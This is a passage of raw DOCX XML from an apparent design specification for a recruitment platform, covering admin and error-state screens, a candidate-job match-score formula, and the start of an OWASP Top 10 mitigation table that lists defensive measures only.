        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 12: Admin Platform Governance &amp; System Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006703318.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 12: Admin Platform Governance &amp; System Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Superuser governance console tracking platform health, active users, requisitions, and security activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Administrator (ROLE_ADMIN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Refresh Metrics button, Tabs (KPI Overview, User Management, Job Moderation, Security Audit Logs), System KPIs (Total Users: 6, Active Requisitions: 6, Applications: 3, Offers: 1), Recent Security Activity stream, Backend Architecture indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/admin/stats, GET /api/admin/logs -&gt; system telemetry data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 13: Admin Registered Accounts &amp; User Moderation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006721345.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 13: Admin Registered Accounts &amp; User Moderation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Administrative user directory for inspecting accounts and toggling active/suspended moderation state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Administrator (ROLE_ADMIN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Filter tabs (All Users, Candidates, Recruiters, Admins), Search accounts input, User table (Avatar, Username, Email, Role badge, Status badge: Active, Moderation Action: Suspend button).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/admin/users, PUT /api/admin/users/{id}/toggle-status -&gt; toggles User.enabled flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 14: System Error State &amp; Empty State Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006379270.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 14: System Error State &amp; Empty State Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Demonstrates graceful degradation when backend services are unreachable or search returns zero items.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>All Users / Resilient Fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Red banner: 'Failed to load opportunities' / '0 Openings Found', 'No matching opportunities' empty state card with 'Reset All Filters' CTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Axios response error interceptor catches 500/network timeout and transitions React UI into error state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>21. Algorithms &amp; Business Logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>21.1 Candidate-Job Match Scoring Formulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Mathematical Formulation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The automated match score algorithm is formulated as a weighted multi-factor compatibility function:</w:t>
        <w:br/>
        <w:t>Match Score = (0.50 * S) + (0.25 * E) + (0.25 * L)</w:t>
        <w:br/>
        <w:t>Where:</w:t>
        <w:br/>
        <w:t>• S = Skill Overlap Factor = (|CandidateSkills ∩ JobRequiredSkills| / |JobRequiredSkills|) * 100</w:t>
        <w:br/>
        <w:t>• E = Experience Alignment Factor = 100 if candidateYears &gt;= requiredYears else (candidateYears / requiredYears) * 100</w:t>
        <w:br/>
        <w:t>• L = Location &amp; Work Mode Fit = 100 if candidateLocation == jobLocation or jobWorkMode == REMOTE else 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Computational Complexity: Set intersection is O(N + M) using Java HashSets where N is candidate skills and M is job required skills. Lookups execute in O(1) constant time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Space Complexity: O(N + M) auxiliary space for normalized lower-case skill collections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>22. Security &amp; OWASP Top 10 Mitigation</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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Threat Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mitigation Mechanism in GlobalCo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A01: Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate accesses /api/recruiter endpoints or modifies another candidate's profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Security URL antMatchers enforce role checks. Service methods verify authenticated user owns the profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A02: Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Leaked passwords or predictable authentication tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>BCrypt password hashing with cost factor 10. HMAC-SHA256 tokens with 256-bit secret key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A03: Injection (SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Malicious SQL payloads injected via search inputs or filters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Data JPA parameterized queries and Hibernate ORM prevent SQL interpretation of user input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A05: Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exposing default H2 consoles or verbose stack traces in production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GlobalExceptionHandler intercepts all exceptions and returns standardized error envelopes without stack traces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A07: Identification &amp; Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
